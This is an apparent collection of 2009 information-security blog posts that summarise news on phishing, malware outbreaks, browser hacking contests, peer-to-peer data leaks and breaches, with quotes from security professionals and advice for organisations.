8 Questions For Uncovering Information Security Vulnerabilities - CIO.com - Business Technology Leadership

Andrew Jaquith considers 8 hypotheses, and for each provides diagnostic questions. A great read.
  1. The network perimeter is porous, permitting easy access to any outsider.
  2. An outsider can readily obtain access to internal systems because password policies are weak.
  3. Once on the network, attackers can easily obtain administrator credentials.
  4. An intruder finding a hole somewhere in the network could easily jump straight to the core transactional systems.
  5. Workstations are at risk for virus or worm attacks.
  6. Viruses and worms can spread quickly to large numbers of computers.
  7. Application security is weak and relies too heavily on the “out of the box” defaults.
  8. The firm’s deployments of applications are much riskier than those made by leaders in the field (for example, investment banking).
Src: 8 Questions For Uncovering Information Security Vulnerabilities | CIO.com [tx to @lennyzeltser]

QOTD on Knowledge vs Training

Knowledge without training is like driving a standard (i.e. manual transmission) without practice - you generate a lot of sputtering noises but achieve little forward motion. -- Dr. Christophe Veltsos, Dr. InfoSec™
This quote is written in response to comments exchanged on the Security Metrics mailing list regarding the value of certifications (which were deemed to be "training").

QOTD on Data Security for CISOs

An excellent article on CSO Online written by Andrew Jaquith for on where CISOs should focus their efforts at securing data.
Instead of trying fruitlessly to be the enterprise's all-knowing content guardian, censor authority, and compliance guru, the CISO devolves responsibility of these activities to the business. IT security becomes a clearinghouse for data security tools that business groups can use as they see fit.
As well as:
Responsibility for classifying information and restricting its flow is ultimately a business challenge, not a technical challenge. How documents, spreadsheets, and emails are used depends on workgroup and business unit preferences. So it is with data security.

That means that inside counsel owns email eDiscovery and retention, product engineering owns CAD drawings, and finance owns accounts and earnings projections. These groups know who should and should not have access and what should happen if their assets are misused. IT security's primary role should be to help source, design, and install the technical controls in place that will enable them to express and enforce their compartmentalization needs—not to be the gatekeeper.
Src: Data Security: Whose Job Is It Really? | CSO Online

Researchers can ID anonymous Twitterers

Those who still think they can use social networking sites and be anonymous should read this article about research done at the University of Texas Austin. Arvind Narayanan, one of the researchers said: "The more of a person's network you can map out, the easier it gets to de-anonymize someone in the future."

Src: Researchers can ID anonymous Twitterers | InfoWorld [tx @geekgrrl]

2nd big Firefox exploit found in a week

Mozilla, maker of the Firefox browser will be releasing an update early next week for a newly discovered exploit. This exploit "provides an opening through which attackers can enter Firefox source code and modify it. If a Firefox user simply views a maliciously coded XML file on a website, in a style of attack known as a drive-by download, the exploit installs unwelcome software onto the victim's machine." [emphasis mine]

The high-priority update will fix the flaw which is reported to work on multiple platforms (Windows, Mac, Linux).

Src: "High-priority" Firefox patch being readied | SC Magazine US

Cybercrooks drooling over social net data

Security professionals have long warned about the abundance of information that people are willing to share about themselves and others, including relatives, friends, and even perfect strangers. This data is useful to cyber criminals seeking to guess your password, reset your account, or fool you into clicking, viewing, or downloading malicious content.

The funny thing is that security professionals are people too, and they also use social networking sites. You can follow many of them on Twitter for example; the SecurityTwits database a good place to start. Just don't expect to find much personal data or easy to guess passwords.

Src: Cautionary tales from the social-networking universe | csmonitor.com

UK ex-spy boss all for preemptive surveillance

David Omand, former director of the UK's Government Communications Headquarters, released a study about the need for government-level digital surveillance. Among the more troubling of his statements is his view that "finding out other people's secrets is going to involve breaking everyday moral rules."

His vision of preemptive surveillance includes monitoring of "databases of airline bookings, advance passenger information, financial, telephone, tax, health, passport and biometric records and phone and internet communications."

He is also reported as saying that "sacrificing some privacy is preferable to other ways of boosting security such as altering the criminal law to make it easier to convict." [emphasis is mine]

Src: UK must pry on data to block threats: ex-spy boss | Reuters

QOTD Rebecca Herold on ID Theft Motivations

Any business, of any size, in any industry, in any location, is a possible target for PII [Personally Identifiable Information] theft and cybercrime if they possess any type of employee, customer or other consumer PII. -- Rebecca Herold, aka The Privacy Professor, Principal of Rebecca Herold & Associates LLC
Src: Many Motivators For Identity Theft | Realtime IT Compliance
Link: Rebecca Herold's Web Site

Newfangled rootkits survive hard disk wiping

While security researchers have been looking into the possibility of using the BIOS to create a permanently infected machine for some years, the Core Security team is reported to have devised a technique that would work on "virtually all types of systems."
Because the infection lives in the computer's BIOS, or basic input/output system, it persists even after the operating system is reinstalled or a computer's hard drive is replaced.
Src: Newfangled rootkits survive hard disk wiping | The Register

Sneakey can duplicate a key from 200ft away

Can you have data security without physical security? I hope you know the answer for your particular facility in light of this research project from the University of California San Diego called "Sneakey." Sneakey is a software which can create a physical duplicate of a key from a digital image. In an experiment conducted from 195ft away, the researchers were able to take a digital photo (zoom lens) of a key chain and match all 5 bitting codes (the indentations on the keys), enough to be able to create a duplicate key.

Src: Sneakey Robbers Turn to the Social Web - ReadWriteWeb [tx @lennyzeltser]

Phishing, vishing and unscrupulous tax preparers pose a threat

Tax documents are a treasure-trove of information, containing name, date-of-birth, social security number, current address. I find the lack of concern for one's most sensitive information most disappointing (note: small sample size, only 1,091 participants surveyed in Feb 2009):
The survey also showed that 1/3 of the respondents who rely on the services of a tax preparer were not at all concerned about the possibility of becoming victims of identity theft when choosing their preparer. An additional 23 percent were somewhat concerned and only 18 percent were very concerned.
Src: Phishing, vishing and unscrupulous tax preparers pose a threat
Src2: Affinion Security Center Survey Finds Taxpayers are Vulnerable to Tax- and Employment-Related Identity Theft | PRNewsWire.com

Helping SMBs take definite steps to face threats

Small and medium sized businesses are often at a loss when it comes to the threats they face and the mitigation strategies they should pursue. While written by a security vendor, GFI, the nine-page document is a worthwhile read for any SMB.
The key to making corporate systems safer does not only require investment in software or hardware security products; very often more knowledge, awareness and a better understanding of existing security policies would be enough to reduce the risk of malware infection, data leakage and fraud.
Src: Helping SMBs take definite steps to face threats

SEO-enhanced cybercrime nets $10K a day

The security firm Finjan has released their latest Cybercrime Intelligence Report. Cybercriminals used affiliate networks to boost their malware and rogueware distribution, using Search Engine Optimization (SEO) techniques to drive additional traffic, and thus revenue. In this case, they made $172,800 in 16 days.

Src: Finjan’s Research Reveals Cybercrime Path to Millions | Finjan

Webcams used to monitor response to bomb threats

Investigating a number of bomb threat hoaxes targeting several college campuses (including Boston College, Purdue University, Clemson University, University of North Carolina, and Florida State), police found that the suspect then used internet-accessible webcams at each campus to monitor the response from law enforcement at each campus.

Src: Bomb hoax strikes several campuses | The Heights [tx @lennyzeltser]

QOTD - Marcus Ranum on ID Theft Victims

Meanwhile, the real victims - people who suffer from identity theft, lost time, or credit fraud - get a nice little letter telling them 'We made a mistake and it's your problem to clean it up. Have a nice day.' To me, the banks and payment companies who are suing each other and finger-pointing are a side-show; they're in business and are simply incurring an unexpected cost for mistakes made. Let's not overlook the victims: real human beings. -- Marcus Ranum, CSO Tenable Security.
Src: SANS NewsBites Vol 11 Num 22

QOTD - Firefox+Windows=Secure?

For all the browsers on operating systems, the hardest target is Firefox on Windows. With Firefox on Mac OS X, you can do whatever you want. There’s nothing in the Mac operating system that will stop you.
The quote is from Pwn2Own hacker Charlie Miller, interviewed by ZDNet's Ryan Naraine. Charlie was the first to break into a Safari browser running on a (patched) MacBook.

Src: Questions for Pwn2Own hacker Charlie Miller | ZDNet.com [tx @alespe]

QOTD on Conficker & Analysis by SRI

Leave it to the folks at SRI International to publish one of the best writeup on the workings on the worm and its impact on honeynets where it takes over as the dominant infection. They also just recently updated their Conficker worm analysis (see direct link to addendum below).
Why Conficker has been able to proliferate so widely may be an interesting testament to the stubbornness of some PC users to avoid staying current with the latest Microsoft security patches. Some reports, such as the case of the Conficker outbreak within Sheffield Hospital's operating ward, suggest that even security-conscious environments may elect to forgo automated software patching, choosing to trade off vulnerability exposure for some perceived notion of platform stability.
Src: An Analysis of Conficker | SRI International
Src: Addendum on Conficker C (dated March 19, 2009) [tx @evilalien]
Src: Additional Conficker links (SANS ISC)

Sniffing keystrokes via laser and keyboard power

This news article reports on a recent CanSecWest presentation by researchers from a company called InversePath into two different methods of sniffing keyboard activity from 50ft away, one using a laser (w/ line of sight to a laptop), the other from signals emanated from a PS/2 keyboard plugged into a grounded outlet (via PC apparently).

Src: Sniffing keystrokes via laser and keyboard power | CNET News [tx @the_ryebread]

QOTD on patching

It's time for the vendors that want to continue to sell to important organizations to take responsibility for active patching. -- Alan Paller, Director of Research, SANS Institute
Src: SANS Institute - @RISK: The Consensus Security Vulnerability Alert

Anatomy of Credit Card Numbers

If you've ever been curious as to what information went into a credit card number, this is a good read. It provides enough details to be able to create a simple program to validate credit card numbers.

Src: Anatomy of Credit Card Numbers [tx @jmcmurry]

How much should you spend on security?

Depending on the source (Gartner vs Forrester), security spending is anywhere from 5% to almost 12% of IT expenditures.

Src: Forrester security spending report | Boaz Gelbord Blog

$100,000 for a browser hack?

According to this article from The Register, "a reliably exploitable IE vulnerability now fetches $100,000 on the black market." While the dollar figure itself may be debatable, one fact isn't: most hackers are in it for the money, the rest are security researchers. At the Pwn2Own 2009 competition, "Nils", a student from the University of Oldenburg in Germany, was able to compromise Safari, IE8, and Firefox.

"Virtually any internet-facing software can be proven vulnerable to real-world exploits." Gentlefolks, start your virtual machines (for an extra degree of protection).

Src: A grim day for browser security at hacker contest | The Register

Staying safe while on Safari, IE, Firefox

For those who still believe that their favorite browser (in this case Safari, but ultimately it could be any browser) is still safe in a sea of network attacks, think again. At the 2009 Pwn2Own competition, Charlie Miller was able to compromise a Safari browser in a matter of seconds. Firefox and IE8 were also no match for a hacker called "Nils" (who also took 2nd place against Safari).

For the more paranoid among you, now would be a good time to look at segregating your sensitive data off of your regular machine, or to start running browsers in virtualized environments (either full VMs or application virtualization).

Src: Pwn2Own 2009: Macbook falls in seconds | Zero Day | ZDNet.com
Src: Updated story about IE8 | Zero Day | ZDNet.com [tx @RyanNaraine]

Fortify Software releases guidelines on unsafe cryptographic algorithms

If you're in the software development or security, one of the questions you should be asking is which cryptographic algorithms are still safe to use. Why? One reason is because with every passing year, CPUs get more speed and are now multi-core, memory gets bigger, networks get more bandwidth. The other is because researchers find flaws and vulnerabilities - some are due to implementation errors, but others stem from the algorithms themselves.

So, if you're wondering if you should still be using MD5 hashes or 256-bit RSA encryption, go read this document for security's sake.

Src: Guidelines on unsafe cryptographic algorithms [tx @tolzak]
Direct link to PDF

Dutch supermarket fingerprint payments plan shelved

In the first weeks of the trial a security expert managed to pay using someone else's fingerprint.
I wonder what the Crossover Error Rate was for this Tip2Pay fingerprint reader system.

Src: Dutch supermarket fingerprint payments plan shelved | Finextra

QOTD - Schultz on Monitoring vs European Privacy Laws

Privacy protection is a major issue and priority in most European countries. At the same time, however, the need for monitoring user Internet activity for discovering illegal activity, identifying employee misconduct, and so on is growing. In the process of achieving equilibrium between privacy and monitoring, some compromises concerning individuals' right to and expectation of privacy will certainly have to be made (as is occurring in Finland), something that will not sit well with most Europeans. -- Dr. Eugene Schultz, CTO of Emagined Security and member SANS NewsBites editorial board
Src: ANS Institute - SANS NewsBites Vol 11 Num 21

QOTD - Knock knock, it's the FTC

Jon Leibowitz, FTC Chairman, warned companies that they must "protect their back doors from hackers, malware, spyware and other high-tech intrusion mechanisms and protect their front door by properly storing and disposing of consumers' data." He indicated that FTC will not be shy about knocking on a company's door to evaluate their practices.

Speaking at the "Securing Personal Data in the Global Economy" conference on March 16, 2009, he also said: "Without adequate data security there really is no privacy."

Src: Leibowitz Pushes For Privacy Harmonization | National Journal Online

Dirty bomb fake news report making the rounds

It has the hallmarks of a real story, usually starting with "At least 12 people have been killed and more than 40 wounded in a bomb blast near market in..." However, don't be fooled by this message claiming to be from the Reuters news agency (it is not) which seems to be based on a story similar to this BBC news report (dated March 6, 2009).

The fake news report contains a link to a web site which then customizes the story based on your IP address and serves your machine with the Mal/WaledPak-E (aka Packed.Win32.Krap.i) malware.

Src: Dirty bomb news report leads to PC infection | Graham Cluley's blog

Stolen computer at UT exposes data on 24K students and 450 faculty

An apparent break-in at an office in the College of Arts and Sciences at the University of Toledo, Ohio yielded more than just a computer: university officials will also be notifying 24,000 students about FERPA data exposure (student ID # and grades). More troubling is that the stolen computer also had data on 450 faculty, including names, birth dates and SSNs.

As is unfortunately too common across most colleges/universities,
The personal data was saved on the computer itself and not on the university's network, which officials are encouraging staff to do.
A university official claimed that the "computer was password protected and many of the files were specifically encrypted or individually password protected." However, as security professionals caution about, using "password-protected" documents (i.e. MS Word, MS Excel, PDFs) is not considered strong protection as this "protection" can easily be cracked or bypassed.

Src: Stolen computer at UT contains personal information of students, faculty

QOTD on Twitter

Twitter is to infosec professionals today what the ARPANET was to university researchers in the early 80s - a communication revolution connecting the best minds on the planet. -- Dr. Christophe Veltsos, Dr. InfoSec™

Who else could connect IT and PigglyWiggly?

Managing Information Technology (IT) doesn't have to be boring. This blog post from Kevin Behr manages to connect IT management (focus on automation) and Piggly Wiggly, a chain of grocery stores mainly in the Southern US.

Src: In Search of The Ultimate IT Robot (Ever been transformed by a trip to Piggly Wiggly?) - /kevinbehr/home

5 Steps to Communicate Security's Value to Non-security People

Anyone who's had the opportunity to hear, read, or talk to Michael Santarcangelo, founder of Security Catalyst, knows him for his focus on people side of information security. In this interview with CSO Online, Michael has some tips for security professionals to help them get executives and boards to understand and approve spending decisions in these tough economic times.

Src: 5 Steps to Communicate Security's Value to Non-security People | CSO Online

BBC-controlled botnet - legal or not?

This is as controversial as it gets. As part of a news media show called "Click", the British Broadcasting Corporation (BBC), ran a story about cyber security in which it controlled a botnet of at least 22,000 computers. It used the botnet to send spam (to their own account) and to perform a Distributed Denial of Service attack (DDoS) with permission of the site owner. Once done with their experiment, the BBC "warned users that their PCs are infected, and advised them on how to make their systems more secure" by modifying their desktop background.

There are several actions for which the BBC could find themselves in hot water:
  1. They may have violated the UK Computer Misuse Act by sending spam.
  2. They may have violated laws by conducting a DDoS attack.
  3. They may have violated laws by changing content on compromised machines (i.e. zombie machines part of the botnet), in this case modifying the desktop background image.
Src: BBC team exposes cyber crime risk
Src: Did BBC break the law by using a botnet to send spam? | Graham Cluley's blog

QOTD - Marcus Ranum on Encryption & Data Leaks

Writing about yet another report of a lost memory stick containing unencrypted sensitive data, Marcus Ranum had this to say:
Let people copy critical data around, and critical data will leak; it's that simple. Encryption is not a panacea, because of the prevalence of keylogging trojans and the fact that people will have to have the data unencrypted, at some point, in order to use it. The answer to data leakage is data control. There is no "plan B". -- Marcus Ranum, member SANS NewsBites editorial board
Src: SANS NewsBites Vol 11 Num 19

On physical security and Linux password resets

For those who still believe that physical security is not a big issue with respect to data security, this illustrated tutorial can help you see the light of just how easy it can be to change the password for the root account on a Linux machine.

Assumptions are that the machine is not encrypted and can be rebooted (usually trivial to reboot a machine if you are sitting in front of it, i.e. physical access).

Src: How To Reset Any Linux Password | MakeUseOf.com [tx to @robpickering]

QOTD on good security metrics

NIST has just released a draft version of publication Directions in Security Metrics Research in which it outlines several properties of good information security metrics (emphasis mine):
To be of value, the method of measurement employed should be reproducible, that is, capable of attaining the same result when performed independently by different competent evaluators. The result should also be repeatable, such that a second assessment by the same evaluators produces the same result. Relevance and timeliness are also implicit considerations, since it is of little benefit to have measures that are not meaningful or whose latency exceeds their usefulness.
Src: Directions in Security Metrics Research (Draft-NISTIR-7564.pdf)

[Humor] SPPD - the Security Patch Procrastination Disorder [Humor]

[Disclaimer: this is a work of fiction meant to be humorous and not a true medical, IT, or InfoSec condition]

SPPD - Security Patch Procrastination Disorder
--- Symptoms and treatment options ---

Note: only an experienced Information Security Professional can make an actual SPPD diagnosis.

The Security Patch Procrastination Disorder is characterized by a general complacency towards the deployment of security patches. In its most extreme form, it is often accompanied by delusions that patching is simply not required for secure IT operations. When this behavior continues during widespread reports of critical patches, it is referred to as Acute Security Patch Procrastination Disorder or ASPPD for short.

SPPD often starts as a benign case of FSOS, or False Sense Of Security, often resulting from unprotected and unmitigated contact with vendor-based security marketers. If left untreated, FSOF eventually erupts into full-blown SPPD (see list of symptoms below). If diagnosed early by an Information Security Professional, SPPD can be treated with simple, but regularly scheduled applications of COTS patches, also known as Commercial-Off-The-Shelf patches.

SPPD diagnosis requires the presence of at least two of the following symptoms, observed for at least one month:
  • Disorganized patching behavior (infrequent patching habits and other incoherent statements like "we apply critical security patches when we see a need")
  • Delusions about the state of software or hardware security (i.e. "what's the worst a software bug can do?")
  • Hallucinations about vendor fairies protecting the data (i.e. "but we're running appliance X from SuperDuperVendor and they used certified pixie dust.")
If after appropriate information security evaluation and reassurance the condition persists, the entity is likely to suffer debilitating cases of JBH, or Just Been Hacked, often accompanied with MSG$, Must Spend Gazillion Dollars.

QOTD on security awareness & education

Speaking about the need to educate users about information security and phishing attacks, Rohyt Belani, CEO of The Intrepidus Group, said:
user education should be approached like a marketing exercise -- if users are nodding off, it will never be effective.
The information security community needs to get more creative in educating users about the dangers facing them in this web 2.0 world. How about a series of books and cartoons portraying the average users and the mean hackers?

Src: 23 percent of users fall for spear phishing | SC Magazine US

The dynamics of successful phishing attacks

Who's better at thwarting phishing attacks, men or women? According to a recent study, neither. Both men and women are equally susceptible to fall for a phishing attack. 23% of people will fall for (i.e. believe in) a spear phishing (i.e. targeted phishing) attack. Attacks written with an authoritative tone are 40% more successful than those offering a reward (bribe).

The SCMagazine article has several interesting points from Joshua Perrymon, CEO of PacketFocus: “We see around 70 percent response with directed attacks.” Perrymon also cautioned that cultural differences will impact the phisher's success: in the US, China, and Japan, authority is seldom challenged, a trait that the phishers can use to their benefit.

Src1: New study details the dynamics of successful phishing | ZDNet.com
Src2: InfoSec: 23 percent of users fall for spear phishing
Presentation slides (PDF)

No User Action Required In Newly Discovered PDF Attack

I've had the good fortune of following Didier Stevens on Twitter for a few months and his research into various software flaws is nothing short of amazing. Didier has managed to demonstrate without a doubt that the latest Adobe PDF Zero-day flaw can trigger an attack even without user intervention. The culprit is one of the many things that your machine does in the background, in this case, the Windows Indexing Service (WIS). In order to index the contents of a PDF file, WIS needs to process it. Yet, the code responsible for processing the PDF is itself vulnerable to this latest attack, which leads to the compromise of a process running with local system privileges.

Src: No User Action Required In Newly Discovered PDF Attack | DarkReading [tx to @gattaca]

Conficker gets upgraded with defenses

Much like a business has to innovate to survive, malware authors have shown remarkable imagination and determination in growing and securing compromised machines. The latest news report on enhancements the Conficker (aka Downadup) worm received, including being more resilient against antivirus and analysis tools as well as expanding the list of potential domains it phones home from 250 to 50,000 per day.

Src: Conficker gets upgraded with defenses | The Register [tx to @kriggins]

Academic Claims to Find Sensitive Medical Info Exposed on Peer-to-Peer Networks | Threat Level from Wired.com

If by some chance you still believe that no harm can come to you from operating (or failing to detect) a Peer-to-Peer (P2P) network, then please read one of these posts if you have any kind of sensitive data about other people.

Src: Academic Claims to Find Sensitive Medical Info Exposed on Peer-to-Peer Networks | Threat Level from Wired.com
Src: Medical data leakage rampant on P2P networks - SC Magazine US

The truth about Twitter Search

This post confirms a theory stemming from the recent adult webcam spam attack. While Twitter officials said they removed the "spammy" posts, a twitter search revealed that deleted tweets never die. It appears the Twitter search engine ignores deleted posts and happily displays valid & deleted posts for all to see.

To prove the theory, I decided to tweet and quickly delete the following: "This message has been deleted and should NOT show up in Twitter search." If you search for it on Twitter search (and possibly other third-party search tools), it will show up. If you don't feel comfortable clicking the link, copy/paste the text into Twitter search. To verify that the message has been deleted, you can click on "View Tweet" which will let you know that the message no longer exists.

This behavior exposes people's mistakes, and in the case of this recent attack, continues to paint a virtual target on their backs by revealing who fell for the scam in the first place. Twitter users, beware.

[Update 4/11/09: It appears that Twitter is now removing older tweets from the search results. To reactivate the tweet referred to in this blog post, I simply posted it again today, and promptly deleted it... but, as explained above, it still shows up in the search results.]

Trolling for easy victims using Twitter

[Last updated on 3/7 at 8:00a CST - see bottom of post]

It's no secret that people have to be mindful of their social networking activities. The information security community has been sounding the alarm for several years, and now the message is finally reaching the mainstream media.

However, what the average user doesn't realize is that their actions speak louder than their status updates. Let me explain. Let's assume we have two social network users, Jane and John. While both are mindful of the information they post about themselves, Jane is more cautious than Joe, the latter being more "click-happy."

Reports of attacks on social networking sites is an almost monthly occurrence. Sometimes the attacks take advantage of vulnerabilities in the design or implementation of the various sites or third party add-ons. Yet, most often, the attacks simply use the flexibility and openness of the social networks and their unsuspecting users as a vector of attack. The latest example, reported today by Sophos' Graham Cluley, consists of Twitter messages touting interesting webcam conversations on a site called "chatwebcamfree.com"

While cautious Jane ignored the tweet, John's curiosity got the best of him: he clicked on the link. The result is that John's Twitter account now sends a tweet touting the same site, which reaches all of John's followers. As of 19:20 (CST), it is still unknown how the attack works, i.e. how it manages to send a tweet using John's account. However, there are several known attacks which could be used to obtain that behavior. The web site displays a web form asking for account credentials; it may be infecting the user's machine and may also be gathering passwords.

Now, any Twitter user who fell for this attack has in effect painted a large target on his back. Locating these users now becomes as simple as searching for the right term. A quick search reveals well over 500 posts containing the name of the target web site. While the oldest post is dated from 26 days ago, 99% of the activity seemed to have occurred today. Each of these users may now become the target of additional attacks.

Remediation strategies should of course help users exercise caution in their surfing habits. However, it may also fall on Twitter to remove these tweets in order to control the infection and help protect those that were lured from additional attacks.

As of 8:14p CST, Twitter has confirmed that 750 accounts fell prey to the adult webcam spam attack. However, while Twitter claims to have removed the "spammy" status updates, the searches conducted at 6:30p and at 8:30p show otherwise as the screenshot below indicates.

As of 8:00a CST on 3/7/2009, a twitter search still reveals 48 pages (up from yesterday's 47 pages) of matches to the search term, clearly exposing people's susceptibility to click dangerous links.

Another QOTD on good security

Organizations vary in their cultures. We expect, then, to find different cultural approaches to security management that apply to each organization [...] An important indicator as to the success of the security role is whether or not the protected population are inclined to comply with security controls, or work around them. Also, do they [users] feel like they can and should approach the security personnel when something looks awry.

I want a devil on my nuclear submarine [...] I want an entrepreneur in my consultancy and hospital. On a nuclear submarine the devil will be respected, but the entrepreneur will be less trusted or tolerated. In a consultancy, the response to the personalities will be reversed.
Posted by Chris Cronin in a SANS/GIAC discussion thread about good security (and reprinted with permission).

QOTD on good security

Good security will almost always make peoples' jobs harder. There is no need to make their jobs harder "just because we can." -- John Mark Allen, posted earlier today on SANS GIAC Advisory board mailing list, in reply to a somewhat heated discussion about security enforcement (reprinted with permission of the author).
I would also like to point the reader toward another related post by Dave Shackleford on "Practical Intelligence" in Infosec, dealing with the need to work with users instead of against them.

QOTD on data theft by insiders

When someone faces the prospect of losing a job, they will do anything to ensure their family is fed and supported. Unfortunately, that includes doing things detrimental to their careers like stealing company information. It's our job to have the policies and security controls in place to protect our organizations and save people from themselves. -- Mark Weatherford, CISO for the State of California, and a member of the SANS NewsBites editorial board.
Src: SANS NewsBites Vol 11. Num. 17

The Building Security In Maturity Model (BSIMM)

Gary McGraw, Ph.D., and colleagues Brian Chess, Ph.D., & Sammy Migues, have released the Building Security In Maturity Model (BSIMM) which is meant to provide guidance on building more secure software. The 53-page document is aimed at "anyone charged with creating and executing a software security initiative." BSIMM also cautions that any software security project needs to have proper backing and visibility:
Most successful initiatives are run by a senior executive who reports to the Board or the CIO of an organization. These executives lead a group that we call the Software Security Group (SSG), charged with directly executing or facilitating the activities described in BSIMM. BSIMM is written with the SSG and SSG leadership in mind.
This is an important body of work with input from representatives of Adobe, EMC, QualComm, Google, Wells Fargo, and Microsoft. The document is licensed under the Creative Commons Attribution-Share Alike 3.0 License (for license details, go to http://creativecommons.org/licenses/by-sa/3.0/).

Src: The Building Security In Maturity Model (BSIMM)

QOTD human dimension to security

In February 2009, the federal government was presented with a new report identifying strategic objectives for improved cyber-security. Produced by the Institute for Information Infrastructure Protection (I3P), the report examines the cyber-security challenges facing the economic, physical, and human infrastructures and called for making cyber-security a national priority.
People must be engaged as a positive force to improve cyber security. Information security systems must be easy to use by non-IT professionals; awareness and education campaigns must be directed at the public and private sectors; and security training should be taught in schools.
Src: Press release from Senator Lieberman | US Senate
Src: Full report (PDF) | I3P

Andrew Jaquith on data breaches - laptops vs servers

Servers tend to be 8-10x more radioactive than endpoint computers -- Andrew Jaquith, Forrester
Earlier today, I had the chance to read an email that Forrester's Andrew Jaquith had posted. I asked him if he would share some of this early research with the rest of the community and was happy to see that he did.

Mining the information contained in the the DatalossDB, Andrew found that while laptop-related breach reports grab the headlines, they often only cover a fraction of the number of records related to server breaches.

Src: Lost Laptops Get the Press; Server Breaches Cause More Stress | The Forrester Blog For Security & Risk Professionals

Mime Sniffing and Phishing

Arbor Networks has blogged about a phishing attack that uses the fact that IE does not use (or believe) the Content-Type tag returned by an HTTP response and instead tries to detect MIME types on its own. In this case, phishers are using that to come up with content that only renders in IE browsers.

Src: Mime Sniffing and Phishing | Arbor Networks Security

2009 = infosec on a shoestring budget

It's no secret that 2009 is promising to be a tough year for nearly everyone. With corporate budgets shrinking, companies are looking to reduce costs by cutting the workforce and/or the number of projects planned/funded. Yet, reports indicate that cybercrime and data breaches have reached new highs, and that organized crime is growing rapidly in the shadows of the digital age.

However, this atmosphere of gloom may be just what the doctor ordered. With less money to spend on security staff and technical controls, companies will have to make do with what they have: people and data. 2009 will be the year of going back to basics and corporations should focus on people and data by creating a company-wide risk management committee involving representatives drawn from leadership positions across every line of business. As Tony Hildesheim, vice president of IT for Washington State Employees Credit Union, said, their risk management committee "goes further in providing increased security awareness, and therefore improved security overall, than any tool we have implemented."

For those companies that find themselves holding an unacceptable level of risk, the popular security controls of 2009 are Data Loss Prevention (DLP), Full Disk Encryption (FDE), and Web Application Firewalls (WAFs).

Src: As the Economy Sinks, Data Breaches Rise | CFO Magazine [tx @PrivacyProf]

The Top 5 Biggest Infosec Lies

While I've always wanted to write something like this, Aaron Hughes, President and CEO of IAC SecureTech and President of Vidoc Razor, beat me to it. A quick read but definitely worth it.
5. There is no evidence that the data has been misused….
4. It was a sophisticated attack….

3. Of course it is secure - the (Military/Law Enforcement/Government) uses this, so it has to be….

2.We have “Insert favorite technology here” so we know we are all set….

1. We are compliant with (HIPAA, GLB, Sarbannes-Oxley, PCI, etc.) so we know we are secure….

Src: The Top 5 Biggest Infosec Lies | INFO[rmation fo]RENSICS

QOTD on cybercrime and security tech

This article contains a powerful but very accurate quote by Ken Dunham, director of global response at iSight Partners, on cybercrime and security technologies:
The sophistication and automation of financially motivated cybercrime is very steep today when compared with counter-efforts... Criminals are agile and able to outpace the rate of adoption of counter-technologies in the marketplace.
Src: As the Economy Sinks, Data Breaches Rise | CFO Magazine [tx @PrivacyProf]

2009 The Year of Outsourcing Dangerously

This nine-page report on the dangers of outsourcing in 2009 is a must read for anyone whose organization is considering outsourcing options. It contains various nuggets of useful information from a ranked list of best (& worst countries) as well as an assessment of various offshore locations (safe vs risky) across ten areas:
  1. Support for capitalism
  2. Corruption & organized crime
  3. Geopolitical conditions
  4. Economy & currency
  5. Law enforcement
  6. IT infrastructure
  7. Environmental laws
  8. Terrorism
  9. Maturity of legal system
  10. Climate
Src: The Black Book of Outsourcing [tx @PrivacyProf]
Direct link: 2009 The Year of Outsourcing Dangerously (PDF)

Some file-sharing clients open users to identity theft

On March 1, 2009, NBC's Natalie Morales reported on Nightly News about the dangers that Peer-to-Peer (P2P) software users face. The family they interviewed used a P2P program (still popular with the teenage crowds) which, unbeknownst to them, was leaking tax return information onto the P2P network.

There are two ways that P2P programs can lead to data leakage; one is due to user misconfiguration, the other due to software flaws. The first is somewhat easy to fix: if, after learning about the dangers of P2P programs, you still find a need to use them, be sure to configure the software so that does not share your entire hard drive but only designated files and folders. The second aspect, software flaws, is something the entire software engineering and information security community have been trying to solve for several decades with no end in sight.

However, this story opens up another worrisome aspect related to taxes, that of the small and medium sized CPAs and tax accountants all over the country who are charged by their customers to figure out their taxes. Tax returns are rich with personal information and need to be appropriately secured. Next time you drop off your tax records, ask how your information will be protected. If instead you find yourself doing your own taxes, be sure to safeguard any data files and/or PDF documents you generated by either encrypting these or storing them off of the main computer (e.g. in a safe, preferably encrypted as well).

Src: Some file-sharing clients open users to identity theft | msnbc.com [video]
Alternate link

Carrot-sticks and security | Layer 8

This article discusses the various avenues available to an Information Security Officer (ISO) who has just discovered that an employee has been visiting "naughty sites and saving certain files locally."

The utility of this article is in the subtleties of each of the options available to the ISO. Every ISO should read it.

Src: Carrot-sticks and security | Layer 8

Waledac malware adds geolocation

Waledac now has another weapon to lure users into installing it: geolocation-based ads. This feature is used to serve what appear to be local ads or coupons which in turns increases the appearance of being a valid service.

Src: Waledac malware adds geolocation - SC Magazine US

Dr.InfoSec on Making a difference

As a faculty member, one of my hopes is that I can make a difference in the lives of the students that I get to have in class. A former student, now clearly on his way to a successful career in Information Security, said to me just this week: "I probably wouldn't be in this field [infosec] if not for your classes."

Getting to see this student mingle with various infosec professionals and knowing that I had something to do with it is its own reward.

Why Do Bad Things Happen to PCI-Compliant Companies?

This article dates back to 10/24/2008, yet in light of the recent breaches including Heartland Payment Systems, is still very much on topic.

Src: Why Do Bad Things Happen to PCI-Compliant Companies?

Marine One blueprints and avionics leaked to Iran through peer-to-peer network

It seems a military contractor has allowed a file containing sensitive data about Marine One to be shared over a Peer-to-Peer (P2P) network. The file was tracked making its way to an IP address in Iran; it contained highly sensitive blueprints for Marine One, including details about the helicopter and avionics packages.

With the proliferation of "sharing" technologies such as P2P and Sharepoint sites, the need for Data Leak Prevention (DLP) is growing. While DLP solutions are still maturing, entities housing sensitive information should take another look at what is running inside their networks and start looking into what's leaving their networks as well.

Many of these sharing technologies are often used by regular users as opposed to being setup and managed by IT, following a documented process, and with a documented business need. This often leads to misconfigured setttings allowing too much access to information.

Src: Marine One blueprints and avionics leaked to Iran through peer-to-peer network | The Raw Story [tx to @geekgrrl]